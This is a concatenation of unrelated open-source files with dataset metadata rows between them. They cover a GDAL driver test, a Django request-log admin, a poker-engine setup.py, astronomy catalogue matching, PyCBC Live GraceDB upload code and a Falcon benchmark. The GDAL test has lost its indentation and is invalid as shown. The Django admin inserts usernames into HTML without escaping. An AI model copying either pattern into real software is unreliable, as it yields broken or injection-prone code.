# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Simple image test of an NLAPS/NDF2 dataset.
def ndf_1():
tst = gdaltest.GDALTest( 'NDF', 'LE7134052000500350.H3', 1, 6510,
xoff = 0, yoff = 0, xsize = 15620, ysize = 1 )
gt = (320325.75, 14.25, 0, 1383062.25, 0, -14.25)
wkt = """PROJCS["UTM Zone 46, Northern Hemisphere",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
TOWGS84[0,0,0,0,0,0,0],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9108"]],
AXIS["Lat",NORTH],
AXIS["Long",EAST],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",93],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["Meter",1]]"""
return tst.testOpen( check_gt = gt, gt_epsilon = 0.0001,
check_prj = wkt )
gdaltest_list = [
ndf_1 ]
if __name__ == '__main__':
gdaltest.setup_run( 'ndf' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| gpl-2.0 | -1,873,844,852,143,710,700 | 35.402439 | 79 | 0.58727 | false |
Mercy-Nekesa/sokoapp | sokoapp/request/admin.py | 1 | 3023 | import json
from datetime import timedelta, date
from django.utils.translation import ugettext_lazy as _
from django.shortcuts import render_to_response
from functools import update_wrapper
from django.template import RequestContext
from django.contrib import admin
from django.http import HttpResponse
from request.models import Request
from request.traffic import modules
from request.plugins import *
class RequestAdmin(admin.ModelAdmin):
list_display = ('time', 'path', 'response', 'method', 'request_from')
fieldsets = (
(_('Request'), {
'fields': ('method', 'path', 'time', 'is_secure', 'is_ajax')
}),
(_('Response'), {
'fields': ('response',)
}),
(_('User info'), {
'fields': ('referer', 'user_agent', 'ip', 'user', 'language')
})
)
raw_id_fields = ('user',)
readonly_fields = ('time',)
def lookup_allowed(self, key, value):
return key == 'user__username' or super(RequestAdmin, self).lookup_allowed(key, value)
def request_from(self, obj):
if obj.user_id:
user = obj.get_user()
return '<a href="?user__username=%s" title="%s">%s</a>' % (user.username, _('Show only requests from this user.'), user)
return '<a href="?ip=%s" title="%s">%s</a>' % (obj.ip, _('Show only requests from this IP address.'), obj.ip)
request_from.short_description = 'From'
request_from.allow_tags = True
def get_urls(self):
from django.conf.urls import patterns, url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.module_name
return patterns('',
url(r'^overview/$', wrap(self.overview), name='%s_%s_overview' % info),
url(r'^overview/traffic.json$', wrap(self.traffic), name='%s_%s_traffic' % info),
) + super(RequestAdmin, self).get_urls()
def overview(self, request):
qs = Request.objects.this_month()
for plugin in plugins.plugins:
plugin.qs = qs
return render_to_response('admin/request/request/overview.html', {
'title': _('Request overview'),
'plugins': plugins.plugins,
}, context_instance=RequestContext(request))
def traffic(self, request):
try:
days_count = int(request.GET.get('days', 30))
except ValueError:
days_count = 30
if days_count < 10:
days_step = 1
elif days_count < 60:
days_step = 2
else:
days_step = 30
days = [date.today() - timedelta(day) for day in xrange(0, days_count, days_step)]
days_qs = [(day, Request.objects.day(date=day)) for day in days]
return HttpResponse(json.dumps(modules.graph(days_qs)), mimetype='text/javascript')
admin.site.register(Request, RequestAdmin)
| mit | 7,751,704,638,266,843,000 | 34.564706 | 132 | 0.597089 | false |
pokermania/pokerengine | setup.py | 1 | 5092 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from os.path import basename
from glob import glob
from distutils.core import setup
from distutils.command.build import build as DistutilsBuild
class ExtendedBuild(DistutilsBuild):
def run(self):
os.system("make -C po")
os.system("bash conf/build.sh")
DistutilsBuild.run(self)
from pprint import pprint as pp
setup(
name='poker-engine',
version='1.5.4',
packages=['pokerengine'],
data_files=[
('bin', ['pokerconfigupgrade']),
('share/poker-engine/conf', [
'conf/poker.0-0_50-5000_limit.xml',
'conf/poker.0-0-limit.xml',
'conf/poker.100000-200000_6000000-8000000_pokermania.xml',
'conf/poker.100-200_10000-15000_pokermania.xml',
'conf/poker.100-200_2000-20000_no-limit.xml',
'conf/poker.100-200_2000-20000_pot-limit.xml',
'conf/poker.100-200_8000-10000_pokermania.xml',
'conf/poker.10-20_100-2000000_ante-limit.xml',
'conf/poker.10-20_200-2000_no-limit.xml',
'conf/poker.10-20_200-2000_pot-limit.xml',
'conf/poker.1-2_10-100_pokermania.xml',
'conf/poker.1-2_20-200_limit.xml',
'conf/poker.1-2_20-200_no-limit.xml',
'conf/poker.1-2_20-200_pot-limit.xml',
'conf/poker.15000-30000_1000000-1500000_pokermania.xml',
'conf/poker.15000-30000_1500000-2000000_pokermania.xml',
'conf/poker.1500-3000_100000-150000_pokermania.xml',
'conf/poker.1500-3000_150000-200000_pokermania.xml',
'conf/poker.15-30_300-3000_limit.xml',
'conf/poker.200-400_15000-20000_pokermania.xml',
'conf/poker.200-400_20000-25000_pokermania.xml',
'conf/poker.20-40_1000-2000_pokermania.xml',
'conf/poker.20-40_2000-4000_pokermania.xml',
'conf/poker.2-4_100-200_pokermania.xml',
'conf/poker.2-4_10-100_pokermania.xml',
'conf/poker.2-4_40-400_no-limit.xml',
'conf/poker.2-4_40-400_pot-limit.xml',
'conf/poker.2500-5000_200000-250000_pokermania.xml',
'conf/poker.2500-5000_250000-300000_pokermania.xml',
'conf/poker.25-50_500-5000_limit.xml',
'conf/poker.300-600_25000-30000_pokermania.xml',
'conf/poker.300-600_30000-40000_pokermania.xml',
'conf/poker.30-60_300-6000000_ante-limit.xml',
'conf/poker.30-60_600-6000_no-limit.xml',
'conf/poker.30-60_600-6000_pot-limit.xml',
'conf/poker.3-6_60-600_no-limit.xml',
'conf/poker.3-6_60-600_pot-limit.xml',
'conf/poker.4000-8000_300000-400000_pokermania.xml',
'conf/poker.4000-8000_400000-600000_pokermania.xml',
'conf/poker.500-1000_40000-50000_pokermania.xml',
'conf/poker.500-1000_50000-100000_pokermania.xml',
'conf/poker.50-100_1000-10000_limit.xml',
'conf/poker.50-100_1000-10000_no-limit.xml',
'conf/poker.50-100_1000-10000_pot-limit.xml',
'conf/poker.5-10_100-1000_limit.xml',
'conf/poker.5-10_100-1000_no-limit.xml',
'conf/poker.5-10_100-1000_pot-limit.xml',
'conf/poker.5-10_200-500_pokermania.xml',
'conf/poker.5-10_500-1000_pokermania.xml',
'conf/poker.60-120_4000-6000_pokermania.xml',
'conf/poker.60-120_6000-8000_pokermania.xml',
'conf/poker.7stud.xml',
'conf/poker.8000-16000_600000-800000_pokermania.xml',
'conf/poker.8000-16000_800000-1000000_pokermania.xml',
'conf/poker.holdem.xml',
'conf/poker.level-001.xml',
'conf/poker.level-10-15-pot-limit.xml',
'conf/poker.level-10-20-no-limit-lsng9.xml',
'conf/poker.level-10-20-no-limit.xml',
'conf/poker.level-15-30-no-limit-wfrmtt.xml',
'conf/poker.level-15-30-no-limit-wsop.xml',
'conf/poker.level-15-30-no-limit.xml',
'conf/poker.level-2-4-limit.xml',
'conf/poker.level-50-100-no-limit-deep-stack.xml',
'conf/poker.level-10-20-no-limit-ante-mtt.xml',
'conf/poker.levels-ante-colin.xml',
'conf/poker.levels-blinds-colin.xml',
'conf/poker.levels-ante-mtt.xml',
'conf/poker.levels-blinds-mtt.xml',
'conf/poker.levels-blinds-deep-stack.xml',
'conf/poker.levels-blinds-lsng9.xml',
'conf/poker.levels-blinds.xml',
'conf/poker.omaha8.xml',
'conf/poker.omaha.xml',
'conf/poker.payouts.xml',
'conf/poker.razz.xml',
]),
('share/man/man8', ['pokerconfigupgrade.8']),
('share/doc/python-poker-engine', ['AUTHORS', 'README.md'])
] + [(
'share/locale/%s/LC_MESSAGES' % locale,
['locale/%s/LC_MESSAGES/poker-engine.mo' % locale]
) for locale in list(basename(po).rsplit('.', 1)[0] for po in glob('po/*.po'))],
cmdclass={'build': ExtendedBuild }
)
| gpl-3.0 | -8,928,794,915,129,660,000 | 44.464286 | 84 | 0.587588 | false |
Noysena/TAROT | Filter_data.py | 1 | 4059 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 18:09:24 2016
@author: nu
"""
from astropy.coordinates import SkyCoord
from astroquery.vizier import Vizier
from astropy import units as u
from astropy.table import Table
import numpy as np
import os, time
def reoffset(d2d, matches, Cdata, Ccata):
n = 0
while n <=9:
#for loop in range (5):
delta_RA = matches.ra.deg - Cdata.ra.deg
delta_DEC = matches.dec.deg - Cdata.dec.deg
reRA = Cdata.ra.deg + np.median(delta_RA)
reDEC = Cdata.dec.deg + np.median(delta_DEC)
Cdata = SkyCoord(reRA, reDEC, frame = 'icrs', unit = (u.deg, u.deg))
idx, d2d, d3d = Cdata.match_to_catalog_sky(Ccata)
matches = Ccata[idx] # Obtain coordinate of closest star in catalog
if np.median(d2d.arcsec) < 0.3: # spartial sampling is 3.3" and exept precision is 0.69" os 0.3 is imposiple to reach
break
n += 1
return idx,d2d, d3d, matches, Cdata
def Lsep_candi(STD, idx, d2d, data):
idx_candi_data_0 = np.where(d2d.arcsec >= (np.median(d2d.arcsec) + STD*d2d.arcsec.std()))
idx_candi_data = np.array(idx_candi_data_0).flatten()
idx_candi_cata = idx[idx_candi_data]
return idx_candi_cata, idx_candi_data
#idx 1st come from Catalog, idx 2nd come from data
#use idx_candi_catalog with catalalog and idx_candi_data with data
def XYlimit(Cdata_offset,idx_candi_data, idx_candi_cata, wcs):
Xpcandi, Ypcandi = wcs.all_world2pix(Cdata_offset[idx_candi_data].ra, Cdata_offset[idx_candi_data].dec, 0)
XYpcandi_table = Table([Xpcandi, Ypcandi], masked=True, names=('Xpix', 'Ypix'), meta={'name':'Candidate in XYimage'})
XYpcandi_lim = []
for i in range(len(XYpcandi_table)):
if 8.0 < XYpcandi_table[i][0] < 2040.0:
if 8.0 < XYpcandi_table[i][1] < 2040.0:
XYpcandi_lim.append(i)
idx_XYpcandi_lim = np.array(XYpcandi_lim, int)
XYcandi = XYpcandi_table[XYpcandi_lim]
#idx of data useful for indicate in data table
idx_XYcandi_data = idx_candi_data[idx_XYpcandi_lim]
#idx of data useful for indicate in catalog table
idx_XYcandi_cata = idx_candi_cata[idx_XYpcandi_lim]
return XYcandi, idx_XYcandi_data, idx_XYcandi_cata
#Convert world to pixel
def W_to_P(Ccata, Cdata_offset, matches, wcs):
Cx, Cy = wcs.all_world2pix(Ccata.ra, Ccata.dec,0)
Mx, My = wcs.all_world2pix(matches.ra, matches.dec,0)
OFx, OFy = wcs.all_world2pix(Cdata_offset.ra, Cdata_offset.dec,0)
Catalog_WTP = Table([Cx, Cy], masked=True, names=('X(RA)', 'Y(DEC)'))
Matches_WTP = Table([Mx, My], masked=True, names=('X(RA)', 'Y(DEC)'))
Cdata_offset_WTP = Table([OFx, OFy], masked=True, names=('X(RA)', 'Y(DEC'))
return Catalog_WTP, Matches_WTP, Cdata_offset_WTP
#add magnitude to SExtractor data
def tbmagnitude(idx, data, cata):
# mag_auto = data['MAG_AUTO']
Gmag = cata['phot_g_mean_mag'][idx]
# tbmag = Table([mag_auto, Gmag], masked=True, names=('MAG_AUTO', 'phot_g_mean_mag'), meta={'name':'Magnitude list'})
data.add_column(Gmag,index=None)
# tbmag.write('/tmp/tbmag.dat', format = 'ascii')
# while not os.path.exists('/tmp/tbmag.dat'):
# time.sleep(1)
return data
def Check_candidate(Cdata_candi, Candi_d2d): #USNO-B1.0
confirm_candi = []; confirm = []
for i in range(len(Cdata_candi)):
confirm_candi = Vizier(catalog="USNO-B1.0",column_filters={"R1mag":"<18.0"}, row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi:
confirm.append(i)
info_check_candi = Candi_d2d[confirm]
return info_check_candi
def Check_candidate_Nomad1(Cdata_candi, Candi_d2d):
confirm_candi = []; confirm = []
for i in range(len(Cdata_candi)):
confirm_candi = Vizier(catalog="NOMAD1",column_filters={"Rmag":"<18.0"}, row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi:
confirm.append(i)
info_check_candi = Candi_d2d[confirm]
return info_check_candi
| gpl-3.0 | 5,036,790,887,645,295,000 | 42.180851 | 162 | 0.651392 | false |
hagabbar/pycbc_copy | pycbc/io/live.py | 1 | 16023 | import logging
import os
import pycbc
import numpy
import lal
from pycbc_glue.ligolw import ligolw
from pycbc_glue.ligolw import lsctables
from pycbc_glue.ligolw import utils as ligolw_utils
from pycbc_glue.ligolw.utils import process as ligolw_process
from pycbc_glue.ligolw import param as ligolw_param
from pycbc import version as pycbc_version
from pycbc import pnutils
from pycbc.tmpltbank import return_empty_sngl
from pycbc.filter import compute_followup_snr_series
#FIXME Legacy build PSD xml helpers, delete me when we move away entirely from
# xml formats
def _build_series(series, dim_names, comment, delta_name, delta_unit):
from pycbc_glue.ligolw import array as ligolw_array
Attributes = ligolw.sax.xmlreader.AttributesImpl
elem = ligolw.LIGO_LW(Attributes({u"Name": unicode(series.__class__.__name__)}))
if comment is not None:
elem.appendChild(ligolw.Comment()).pcdata = comment
elem.appendChild(ligolw.Time.from_gps(series.epoch, u"epoch"))
elem.appendChild(ligolw_param.from_pyvalue(u"f0", series.f0, unit=u"s^-1"))
delta = getattr(series, delta_name)
if numpy.iscomplexobj(series.data.data):
data = numpy.row_stack((numpy.arange(len(series.data.data)) * delta,
series.data.data.real, series.data.data.imag))
else:
data = numpy.row_stack((numpy.arange(len(series.data.data)) * delta, series.data.data))
a = ligolw_array.from_array(series.name, data, dim_names=dim_names)
a.Unit = str(series.sampleUnits)
dim0 = a.getElementsByTagName(ligolw.Dim.tagName)[0]
dim0.Unit = delta_unit
dim0.Start = series.f0
dim0.Scale = delta
elem.appendChild(a)
return elem
def snr_series_to_xml(snr_series, document, sngl_inspiral_id):
"""Save an SNR time series into an XML document, in a format compatible
with BAYESTAR.
"""
snr_lal = snr_series.lal()
snr_lal.name = 'snr'
snr_lal.sampleUnits = ''
snr_xml = _build_series(snr_lal, (u'Time', u'Time,Real,Imaginary'), None,
'deltaT', 's')
snr_node = document.childNodes[-1].appendChild(snr_xml)
eid_param = ligolw_param.new_param(u'event_id', u'ilwd:char',
unicode(sngl_inspiral_id))
snr_node.appendChild(eid_param)
def make_psd_xmldoc(psddict):
Attributes = ligolw.sax.xmlreader.AttributesImpl
xmldoc = ligolw.Document()
root_name = u"psd"
lw = xmldoc.appendChild(ligolw.LIGO_LW(Attributes({u"Name": root_name})))
for instrument, psd in psddict.items():
xmlseries = _build_series(psd, (u"Frequency,Real", u"Frequency"),
None, 'deltaF', 's^-1')
fs = lw.appendChild(xmlseries)
fs.appendChild(ligolw_param.from_pyvalue(u"instrument", instrument))
return xmldoc
class SingleCoincForGraceDB(object):
"""Create xml files and submit them to gracedb from PyCBC Live"""
def __init__(self, ifos, coinc_results, **kwargs):
"""Initialize a ligolw xml representation of a zerolag trigger
for upload from pycbc live to gracedb.
Parameters
----------
ifos: list of strs
A list of the ifos pariticipating in this trigger
coinc_results: dict of values
A dictionary of values. The format is defined in
pycbc/events/coinc.py and matches the on disk representation
in the hdf file for this time.
"""
followup_ifos = kwargs.get('followup_ifos') or []
self.template_id = coinc_results['foreground/%s/template_id' % ifos[0]]
# remember if this should be marked as HWINJ
self.is_hardware_injection = ('HWINJ' in coinc_results)
# remember if we want to use a non-standard gracedb server
self.gracedb_server = kwargs.get('gracedb_server')
# compute SNR time series if needed, and figure out which of
# the followup detectors are usable
subthreshold_sngl_time = numpy.mean(
[coinc_results['foreground/%s/end_time' % ifo]
for ifo in ifos])
self.upload_snr_series = kwargs.get('upload_snr_series')
usable_ifos = []
if self.upload_snr_series:
self.snr_series = {}
self.snr_series_psd = {}
htilde = kwargs['bank'][self.template_id]
for ifo in ifos + followup_ifos:
if ifo in ifos:
trig_time = coinc_results['foreground/%s/end_time' % ifo]
else:
trig_time = subthreshold_sngl_time
# NOTE we only check the state/DQ of followup IFOs here.
# IFOs producing the coincidence are assumed to also
# produce valid SNR series.
snr_series, snr_series_psd = compute_followup_snr_series(
kwargs['data_readers'][ifo], htilde, trig_time,
check_state=(ifo in followup_ifos))
if snr_series is not None:
self.snr_series[ifo] = snr_series
self.snr_series_psd[ifo] = snr_series_psd
usable_ifos.append(ifo)
else:
usable_ifos = ifos
# Set up the bare structure of the xml document
outdoc = ligolw.Document()
outdoc.appendChild(ligolw.LIGO_LW())
proc_id = ligolw_process.register_to_xmldoc(
outdoc, 'pycbc', {}, ifos=usable_ifos, comment='',
version=pycbc_version.git_hash,
cvs_repository='pycbc/'+pycbc_version.git_branch,
cvs_entry_time=pycbc_version.date).process_id
# Set up coinc_definer table
coinc_def_table = lsctables.New(lsctables.CoincDefTable)
coinc_def_id = lsctables.CoincDefID(0)
coinc_def_row = lsctables.CoincDef()
coinc_def_row.search = "inspiral"
coinc_def_row.description = "sngl_inspiral<-->sngl_inspiral coincs"
coinc_def_row.coinc_def_id = coinc_def_id
coinc_def_row.search_coinc_type = 0
coinc_def_table.append(coinc_def_row)
outdoc.childNodes[0].appendChild(coinc_def_table)
# Set up coinc inspiral and coinc event tables
coinc_id = lsctables.CoincID(0)
coinc_event_table = lsctables.New(lsctables.CoincTable)
coinc_event_row = lsctables.Coinc()
coinc_event_row.coinc_def_id = coinc_def_id
coinc_event_row.nevents = len(usable_ifos)
coinc_event_row.instruments = ','.join(usable_ifos)
coinc_event_row.time_slide_id = lsctables.TimeSlideID(0)
coinc_event_row.process_id = proc_id
coinc_event_row.coinc_event_id = coinc_id
coinc_event_row.likelihood = 0.
coinc_event_table.append(coinc_event_row)
outdoc.childNodes[0].appendChild(coinc_event_table)
# Set up sngls
sngl_inspiral_table = lsctables.New(lsctables.SnglInspiralTable)
coinc_event_map_table = lsctables.New(lsctables.CoincMapTable)
sngl_populated = None
for sngl_id, ifo in enumerate(usable_ifos):
sngl = return_empty_sngl(nones=True)
sngl.event_id = lsctables.SnglInspiralID(sngl_id)
sngl.process_id = proc_id
sngl.ifo = ifo
names = [n.split('/')[-1] for n in coinc_results
if 'foreground/%s' % ifo in n]
for name in names:
val = coinc_results['foreground/%s/%s' % (ifo, name)]
if name == 'end_time':
sngl.set_end(lal.LIGOTimeGPS(val))
else:
try:
setattr(sngl, name, val)
except AttributeError:
pass
if sngl.mass1 and sngl.mass2:
sngl.mtotal, sngl.eta = pnutils.mass1_mass2_to_mtotal_eta(
sngl.mass1, sngl.mass2)
sngl.mchirp, _ = pnutils.mass1_mass2_to_mchirp_eta(
sngl.mass1, sngl.mass2)
sngl_populated = sngl
if sngl.snr:
sngl.eff_distance = (sngl.sigmasq)**0.5 / sngl.snr
sngl_inspiral_table.append(sngl)
# Set up coinc_map entry
coinc_map_row = lsctables.CoincMap()
coinc_map_row.table_name = 'sngl_inspiral'
coinc_map_row.coinc_event_id = coinc_id
coinc_map_row.event_id = sngl.event_id
coinc_event_map_table.append(coinc_map_row)
if self.upload_snr_series:
snr_series_to_xml(self.snr_series[ifo], outdoc, sngl.event_id)
# for subthreshold detectors, respect BAYESTAR's assumptions and checks
bayestar_check_fields = ('mass1 mass2 mtotal mchirp eta spin1x '
'spin1y spin1z spin2x spin2y spin2z').split()
for sngl in sngl_inspiral_table:
if sngl.ifo in followup_ifos:
for bcf in bayestar_check_fields:
setattr(sngl, bcf, getattr(sngl_populated, bcf))
sngl.set_end(lal.LIGOTimeGPS(subthreshold_sngl_time))
outdoc.childNodes[0].appendChild(coinc_event_map_table)
outdoc.childNodes[0].appendChild(sngl_inspiral_table)
# Set up the coinc inspiral table
coinc_inspiral_table = lsctables.New(lsctables.CoincInspiralTable)
coinc_inspiral_row = lsctables.CoincInspiral()
# This seems to be used as FAP, which should not be in gracedb
coinc_inspiral_row.false_alarm_rate = 0
coinc_inspiral_row.minimum_duration = 0.
coinc_inspiral_row.set_ifos(usable_ifos)
coinc_inspiral_row.coinc_event_id = coinc_id
coinc_inspiral_row.mchirp = sngl_populated.mchirp
coinc_inspiral_row.mass = sngl_populated.mtotal
coinc_inspiral_row.end_time = sngl_populated.end_time
coinc_inspiral_row.end_time_ns = sngl_populated.end_time_ns
coinc_inspiral_row.snr = coinc_results['foreground/stat']
far = 1.0 / (lal.YRJUL_SI * coinc_results['foreground/ifar'])
coinc_inspiral_row.combined_far = far
coinc_inspiral_table.append(coinc_inspiral_row)
outdoc.childNodes[0].appendChild(coinc_inspiral_table)
self.outdoc = outdoc
self.time = sngl_populated.get_end()
def save(self, filename):
"""Write this trigger to gracedb compatible xml format
Parameters
----------
filename: str
Name of file to write to disk.
"""
ligolw_utils.write_filename(self.outdoc, filename)
def upload(self, fname, psds, low_frequency_cutoff,
testing=True,
extra_strings=None,
):
"""Upload this trigger to gracedb
Parameters
----------
fname: str
The name to give the xml file associated with this trigger
pds: dict of pybc.types.FrequencySeries
A ifo keyed dictionary of psds to be uploaded in association
with this trigger.
low_frequency_cutoff: float
The low frequency cutoff of the psds.
testing: bool
Switch to determine if the upload should be sent to gracedb as a
test trigger (True) or a production trigger (False)
"""
from ligo.gracedb.rest import GraceDb
# first of all, make sure the event and PSDs are saved on disk
# as GraceDB operations can fail later
self.save(fname)
psds_lal = {}
for ifo in psds:
psd = psds[ifo]
kmin = int(low_frequency_cutoff / psd.delta_f)
fseries = lal.CreateREAL8FrequencySeries(
"psd", psd.epoch, low_frequency_cutoff, psd.delta_f,
lal.StrainUnit**2 / lal.HertzUnit, len(psd) - kmin)
fseries.data.data = psd.numpy()[kmin:] / pycbc.DYN_RANGE_FAC ** 2.0
psds_lal[ifo] = fseries
psd_xmldoc = make_psd_xmldoc(psds_lal)
psd_xml_path = os.path.splitext(fname)[0] + '-psd.xml.gz'
ligolw_utils.write_filename(psd_xmldoc, psd_xml_path, gz=True)
if self.upload_snr_series:
snr_series_fname = os.path.splitext(fname)[0] + '.hdf'
for ifo in self.snr_series:
self.snr_series[ifo].save(snr_series_fname,
group='%s/snr' % ifo)
self.snr_series_psd[ifo].save(snr_series_fname,
group='%s/psd' % ifo)
# try connecting to GraceDB
try:
gracedb = GraceDb(self.gracedb_server) \
if self.gracedb_server is not None else GraceDb()
except Exception as exc:
logging.error('Cannot connect to GraceDB')
logging.error(str(exc))
logging.error('Carrying on, but event %s will NOT be uploaded!', fname)
return None
# create GraceDB event
group = 'Test' if testing else 'CBC'
try:
r = gracedb.createEvent(group, "pycbc", fname, "AllSky").json()
except Exception as exc:
logging.error('Cannot create GraceDB event')
logging.error(str(exc))
logging.error('Carrying on, but event %s will NOT be uploaded!', fname)
return None
logging.info("Uploaded event %s", r["graceid"])
if self.is_hardware_injection:
try:
gracedb.writeLabel(r['graceid'], 'INJ')
except Exception as exc:
logging.error("Cannot tag event %s as an injection", r["graceid"])
logging.error(str(exc))
logging.info("Tagging event %s as an injection", r["graceid"])
# upload PSDs
try:
gracedb.writeLog(r["graceid"],
"PyCBC PSD estimate from the time of event",
"psd.xml.gz", open(psd_xml_path, "rb").read(),
"psd").json()
except Exception as exc:
logging.error("Cannot upload PSDs for event %s", r["graceid"])
logging.error(str(exc))
logging.info("Uploaded PSDs for event %s", r["graceid"])
# add other tags and comments
try:
gracedb.writeLog(r["graceid"],
"Using PyCBC code hash %s" % pycbc_version.git_hash).json()
extra_strings = [] if extra_strings is None else extra_strings
for text in extra_strings:
gracedb.writeLog(r["graceid"], text).json()
except Exception as exc:
logging.error("Cannot write comments for event %s", r["graceid"])
logging.error(str(exc))
# upload SNR series in HDF format
if self.upload_snr_series:
try:
gracedb.writeFile(r['graceid'], snr_series_fname)
except Exception as exc:
logging.error("Cannot upload HDF SNR series for event %s",
r["graceid"])
logging.error(str(exc))
return r['graceid']
class SingleForGraceDB(SingleCoincForGraceDB):
"""Create xml files and submit them to gracedb from PyCBC Live"""
def __init__(self, ifo, sngls_dict, hardware_injection=False, **kwds):
"""Initialize a ligolw xml representation of this single trigger for
upload to gracedb
Parameters
----------
ifo: str
The IFO that the trigger came from.
sngls_dict: dict
Dictionary of singles parameters. Must include template parameters
and both 'ifar' and 'stat' values.
"""
fake_coinc = {}
fake_coinc['foreground/stat'] = sngls_dict.pop('stat')
fake_coinc['foreground/ifar'] = sngls_dict.pop('ifar')
for key in sngls_dict:
fake_coinc['foreground/%s/%s' % (ifo, key)] = sngls_dict[key]
if hardware_injection:
fake_coinc['HWINJ'] = True
SingleCoincForGraceDB.__init__(self, [ifo], fake_coinc, **kwds)
| gpl-3.0 | 3,165,173,620,786,652,700 | 42.422764 | 95 | 0.592835 | false |
openilabs/falconlab | env/lib/python2.7/site-packages/falcon/bench/bench.py | 1 | 6616 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from collections import defaultdict
import cProfile
from decimal import Decimal
import gc
import random
import sys
import timeit
try:
import guppy
except ImportError:
heapy = None
else:
heapy = guppy.hpy()
try:
import pprofile
except ImportError:
pprofile = None
from falcon.bench import create # NOQA
import falcon.testing as helpers
def bench(name, iterations, env, stat_memory):
func = create_bench(name, env)
gc.collect()
heap_diff = None
if heapy and stat_memory:
heap_before = heapy.heap()
total_sec = timeit.timeit(func, setup=gc.enable, number=iterations)
if heapy and stat_memory:
heap_diff = heapy.heap() - heap_before
sec_per_req = Decimal(total_sec) / Decimal(iterations)
sys.stdout.write('.')
sys.stdout.flush()
return (name, sec_per_req, heap_diff)
def profile(name, env, filename=None, verbose=False):
if filename:
filename = name + '-' + filename
print('Profiling %s ==> %s' % (name, filename))
else:
filename = None
title = name + ' profile'
print()
print('=' * len(title))
print(title)
print('=' * len(title))
func = create_bench(name, env)
gc.collect()
code = 'for x in xrange(10000): func()'
if verbose:
if pprofile is None:
print('pprofile not found. Please install pprofile and try again.')
return
pprofile.runctx(code, locals(), globals(), filename=filename)
else:
cProfile.runctx(code, locals(), globals(),
sort='tottime', filename=filename)
BODY = helpers.rand_string(10240, 10240) # NOQA
HEADERS = {'X-Test': 'Funky Chicken'} # NOQA
def create_bench(name, env):
srmock = helpers.StartResponseMock()
function = name.lower().replace('-', '_')
app = eval('create.{0}(BODY, HEADERS)'.format(function))
def bench():
app(env, srmock)
if srmock.status != '200 OK':
raise AssertionError(srmock.status + ' != 200 OK')
return bench
def consolidate_datasets(datasets):
results = defaultdict(list)
for dataset in datasets:
for name, sec_per_req, _ in dataset:
results[name].append(sec_per_req)
return [(name, min(vector)) for name, vector in results.items()]
def round_to_int(dec):
return int(dec.to_integral_value())
def avg(array):
return sum(array) / len(array)
def hello_env():
request_headers = {'Content-Type': 'application/json'}
return helpers.create_environ('/hello/584/test',
query_string='limit=10&thing=ab',
headers=request_headers)
def queues_env():
request_headers = {'Content-Type': 'application/json'}
path = ('/v1/852809/queues/0fd4c8c6-bd72-11e2-8e47-db5ebd4c8125'
'/claims/db5ebd4c8125')
qs = 'limit=10&thing=a%20b&x=%23%24'
return helpers.create_environ(path, query_string=qs,
headers=request_headers)
def get_env(framework):
return queues_env() if framework == 'falcon-ext' else hello_env()
def run(frameworks, trials, iterations, stat_memory):
# Skip any frameworks that are not installed
for name in frameworks:
try:
create_bench(name, hello_env())
except ImportError as ex:
print(ex)
print('Skipping missing library: ' + name)
del frameworks[frameworks.index(name)]
print()
if not frameworks:
print('Nothing to do.\n')
return
datasets = []
for r in range(trials):
random.shuffle(frameworks)
sys.stdout.write('Benchmarking, Trial %d of %d' %
(r + 1, trials))
sys.stdout.flush()
dataset = [bench(framework, iterations,
get_env(framework), stat_memory)
for framework in frameworks]
datasets.append(dataset)
print('done.')
return datasets
def main():
frameworks = [
'bottle',
'falcon',
'falcon-ext',
'flask',
'pecan',
'werkzeug'
]
parser = argparse.ArgumentParser(description="Falcon benchmark runner")
parser.add_argument('-b', '--benchmark', type=str, action='append',
choices=frameworks, dest='frameworks', nargs='+')
parser.add_argument('-i', '--iterations', type=int, default=50000)
parser.add_argument('-t', '--trials', type=int, default=3)
parser.add_argument('-p', '--profile', type=str,
choices=['standard', 'verbose'])
parser.add_argument('-o', '--profile-output', type=str, default=None)
parser.add_argument('-m', '--stat-memory', action='store_true')
args = parser.parse_args()
if args.stat_memory and heapy is None:
print('WARNING: Guppy not installed; memory stats are unavailable.\n')
if args.frameworks:
frameworks = args.frameworks
# Normalize frameworks type
normalized_frameworks = []
for one_or_many in frameworks:
if isinstance(one_or_many, list):
normalized_frameworks.extend(one_or_many)
else:
normalized_frameworks.append(one_or_many)
frameworks = normalized_frameworks
# Profile?
if args.profile:
for name in frameworks:
profile(name, get_env(name),
filename=args.profile_output,
verbose=(args.profile == 'verbose'))
print()
return
# Otherwise, benchmark
datasets = run(frameworks, args.trials, args.iterations,
args.stat_memory)
dataset = consolidate_datasets(datasets)
